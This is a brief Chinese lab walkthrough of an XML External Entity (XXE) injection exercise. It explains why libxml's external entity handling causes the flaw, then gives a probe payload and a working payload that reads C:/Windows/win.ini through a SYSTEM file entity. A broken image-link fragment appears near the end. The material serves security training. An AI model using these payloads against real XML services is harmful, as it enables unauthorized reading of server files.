XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
# 看到XXE页面有一个post提交框,我们先输入内容然后进行抓包
# 发现是xml型,然后我们就用测试语句
<!DOCTYPE a [<!ENTITY b "xxe">]><c>&b;</c>
# 如果返回xee证明存在漏洞
# 然后我们开始对其进行payload
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C:/Windows/win.ini"> ]><x>&f;</x>
jk1r-1722341616540)]
测试成功,完成练习